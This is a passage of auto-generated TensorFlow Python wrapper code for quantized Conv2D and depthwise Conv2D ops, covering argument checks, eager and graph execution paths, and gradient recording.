_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBiasSumAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasSumAndReluOutput._make(_result)
return _result
QuantizedConv2DWithBiasSumAndRelu = tf_export("raw_ops.QuantizedConv2DWithBiasSumAndRelu")(_ops.to_raw_op(quantized_conv2d_with_bias_sum_and_relu))
def quantized_conv2d_with_bias_sum_and_relu_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, summand, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_sum_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_sum_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_sum_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
bias = _ops.convert_to_tensor(bias, _dtypes.float32)
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
summand = _ops.convert_to_tensor(summand, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter, summand]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBiasSumAndRelu", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBiasSumAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasSumAndReluOutput._make(_result)
return _result
_QuantizedConv2DWithBiasSumAndReluAndRequantizeOutput = collections.namedtuple(
"QuantizedConv2DWithBiasSumAndReluAndRequantize",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias_sum_and_relu_and_requantize(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, summand, min_summand, max_summand, strides, padding, out_type=_dtypes.quint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
summand: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_summand: A `Tensor` of type `float32`.
max_summand: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBiasSumAndReluAndRequantize", name, input,
filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, summand, min_summand,
max_summand, "out_type", out_type, "strides", strides, "padding",
padding, "dilations", dilations, "padding_list", padding_list)
_result = _QuantizedConv2DWithBiasSumAndReluAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_sum_and_relu_and_requantize_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, summand, min_summand,
max_summand, out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_sum_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_sum_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_sum_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBiasSumAndReluAndRequantize", input=input,
filter=filter,
bias=bias,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
summand=summand,
min_summand=min_summand,
max_summand=max_summand,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "Tbias",
_op._get_attr_type("Tbias"), "Tsummand",
_op._get_attr_type("Tsummand"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBiasSumAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasSumAndReluAndRequantizeOutput._make(_result)
return _result
QuantizedConv2DWithBiasSumAndReluAndRequantize = tf_export("raw_ops.QuantizedConv2DWithBiasSumAndReluAndRequantize")(_ops.to_raw_op(quantized_conv2d_with_bias_sum_and_relu_and_requantize))
def quantized_conv2d_with_bias_sum_and_relu_and_requantize_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, summand, min_summand, max_summand, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_sum_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_sum_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_sum_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
_attr_Tsummand, (summand,) = _execute.args_to_matching_eager([summand], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
min_summand = _ops.convert_to_tensor(min_summand, _dtypes.float32)
max_summand = _ops.convert_to_tensor(max_summand, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, summand, min_summand, max_summand]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "Tbias",
_attr_Tbias, "Tsummand", _attr_Tsummand, "out_type", out_type, "strides",
strides, "padding", padding, "dilations", dilations, "padding_list",
padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBiasSumAndReluAndRequantize",
3, inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBiasSumAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasSumAndReluAndRequantizeOutput._make(_result)
return _result
_QuantizedDepthwiseConv2DOutput = collections.namedtuple(
"QuantizedDepthwiseConv2D",
["output", "min_output", "max_output"])
def quantized_depthwise_conv2d(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], name=None):
r"""Computes quantized depthwise Conv2D.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original input tensor.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original filter tensor.
min_input: A `Tensor` of type `float32`.
The float value that the minimum quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the maximum quantized input value represents.
min_filter: A `Tensor` of type `float32`.
The float value that the minimum quantized filter value represents.
max_filter: A `Tensor` of type `float32`.
The float value that the maximum quantized filter value represents.
strides: A list of `ints`. List of stride values.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
The type of the output.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
List of dilation values.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedDepthwiseConv2D", name, input, filter, min_input,
max_input, min_filter, max_filter, "out_type", out_type, "strides",
strides, "padding", padding, "dilations", dilations)
_result = _QuantizedDepthwiseConv2DOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_depthwise_conv2d_eager_fallback(
input, filter, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedDepthwiseConv2D", input=input, filter=filter,
min_input=min_input, max_input=max_input,
min_filter=min_filter,
max_filter=max_filter, strides=strides,
padding=padding, out_type=out_type,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedDepthwiseConv2D", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DOutput._make(_result)
return _result
QuantizedDepthwiseConv2D = tf_export("raw_ops.QuantizedDepthwiseConv2D")(_ops.to_raw_op(quantized_depthwise_conv2d))
def quantized_depthwise_conv2d_eager_fallback(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations)
_result = _execute.execute(b"QuantizedDepthwiseConv2D", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedDepthwiseConv2D", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DOutput._make(_result)
return _result
_QuantizedDepthwiseConv2DWithBiasOutput = collections.namedtuple(
"QuantizedDepthwiseConv2DWithBias",
["output", "min_output", "max_output"])
def quantized_depthwise_conv2d_with_bias(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], name=None):
r"""Computes quantized depthwise Conv2D with Bias.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original input tensor.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original filter tensor.
bias: A `Tensor` of type `float32`. The original bias tensor.
min_input: A `Tensor` of type `float32`.
The float value that the minimum quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the maximum quantized input value represents.
min_filter: A `Tensor` of type `float32`.
The float value that the minimum quantized filter value represents.
max_filter: A `Tensor` of type `float32`.
The float value that the maximum quantized filter value represents.
strides: A list of `ints`. List of stride values.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
The type of the output.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
List of dilation values.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedDepthwiseConv2DWithBias", name, input, filter, bias,
min_input, max_input, min_filter, max_filter, "out_type", out_type,
"strides", strides, "padding", padding, "dilations", dilations)
_result = _QuantizedDepthwiseConv2DWithBiasOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_depthwise_conv2d_with_bias_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d_with_bias' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d_with_bias' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedDepthwiseConv2DWithBias", input=input, filter=filter,
bias=bias, min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
strides=strides, padding=padding,
out_type=out_type,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedDepthwiseConv2DWithBias", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DWithBiasOutput._make(_result)
return _result
QuantizedDepthwiseConv2DWithBias = tf_export("raw_ops.QuantizedDepthwiseConv2DWithBias")(_ops.to_raw_op(quantized_depthwise_conv2d_with_bias))
def quantized_depthwise_conv2d_with_bias_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d_with_bias' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d_with_bias' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
bias = _ops.convert_to_tensor(bias, _dtypes.float32)
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations)
_result = _execute.execute(b"QuantizedDepthwiseConv2DWithBias", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedDepthwiseConv2DWithBias", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DWithBiasOutput._make(_result)
return _result
_QuantizedDepthwiseConv2DWithBiasAndReluOutput = collections.namedtuple(
"QuantizedDepthwiseConv2DWithBiasAndRelu",
["output", "min_output", "max_output"])
def quantized_depthwise_conv2d_with_bias_and_relu(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""Computes quantized depthwise Conv2D with Bias and Relu.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original input tensor.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original filter tensor.
bias: A `Tensor` of type `float32`. The original bias tensor.
min_input: A `Tensor` of type `float32`.
The float value that the minimum quantized input value represents.
max_input: A `Tensor` of type `float32`.
The float value that the maximum quantized input value represents.
min_filter: A `Tensor` of type `float32`.
The float value that the minimum quantized filter value represents.
max_filter: A `Tensor` of type `float32`.
The float value that the maximum quantized filter value represents.
strides: A list of `ints`. List of stride values.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
The type of the output.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
List of dilation values.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedDepthwiseConv2DWithBiasAndRelu", name, input, filter,
bias, min_input, max_input, min_filter, max_filter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations",
dilations, "padding_list", padding_list)
_result = _QuantizedDepthwiseConv2DWithBiasAndReluOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_depthwise_conv2d_with_bias_and_relu_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedDepthwiseConv2DWithBiasAndRelu", input=input, filter=filter,
bias=bias,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedDepthwiseConv2DWithBiasAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DWithBiasAndReluOutput._make(_result)
return _result
QuantizedDepthwiseConv2DWithBiasAndRelu = tf_export("raw_ops.QuantizedDepthwiseConv2DWithBiasAndRelu")(_ops.to_raw_op(quantized_depthwise_conv2d_with_bias_and_relu))
def quantized_depthwise_conv2d_with_bias_and_relu_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
bias = _ops.convert_to_tensor(bias, _dtypes.float32)
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedDepthwiseConv2DWithBiasAndRelu", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedDepthwiseConv2DWithBiasAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DWithBiasAndReluOutput._make(_result)
return _result
_QuantizedDepthwiseConv2DWithBiasAndReluAndRequantizeOutput = collections.namedtuple(
"QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize",
["output", "min_output", "max_output"])
def quantized_depthwise_conv2d_with_bias_and_relu_and_requantize(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type=_dtypes.quint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""Computes quantized depthwise Conv2D with Bias, Relu and Requantize.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original input tensor.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original filter tensor.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
The original bias tensor.
min_input: A `Tensor` of type `float32`.
The float value that the minimum quantized input value represents.
max_input: A `Tensor` of type `float32`.
